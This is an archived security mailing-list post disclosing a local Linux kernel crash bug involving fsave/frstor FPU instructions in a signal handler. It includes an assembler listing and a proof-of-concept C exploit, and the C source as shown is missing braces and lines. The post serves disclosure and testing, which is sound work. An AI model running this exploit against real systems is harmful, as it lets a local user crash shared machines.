lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
From: lorenzohgh at (Lorenzo Hernandez Garcia-Hierro)
Subject: linux kernel local crash seen on slashdot


> Looked through the archives here and didn't see this one yet..

There is also an article in Slashdot ( i've been out of the list and
possibly others sent the link , anyway i'm pasting it here ):

There is proof of concept code at some of the slashdot comments,this is
a modified version with more information ( and a little change of fsave


/* --------------------
 * frstor Local Kernel exploit
 * Crashes any kernel from 2.4.18
 * to 2.6.7 because frstor in assembler inline offsets in memory by 4.
 * Original proof of concept code
 * by
 * Added some stuff by
 * and fixed the fsave line with (*fpubuf).
 * --------------------

Some debugging information made
available by
        pushl   %ebp
        movl    %esp, %ebp
        subl    $136, %esp
        leal    -120(%ebp), %eax
        movl    %eax, -124(%ebp)
        fsave -124(%ebp)

        subl    $4, %esp
        pushl   $1
        pushl   $.LC0
        pushl   $2
        call    write
        addl    $16, %esp
        leal    -120(%ebp), %eax
        movl    %eax, -128(%ebp)
        frstor -128(%ebp)


#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

static void TakeDown(int ignore)
 char fpubuf[108];
// __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
__asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf)); 
 write(2, "*", 1);
 __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));

int main(int argc, char *argv[])
 struct itimerval spec;
 signal(SIGALRM, TakeDown);
 setitimer(ITIMER_REAL, &spec, NULL);
  write(1, ".", 1);

 return 0;
// <<EOF


PS: My 2.4.25-gentoo seems not affected by this but the bf24 flavour of
my old box is vulnerable.
Lorenzo Hernandez Garcia-Hierro <>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada
Url :

Powered by blists - more mailing lists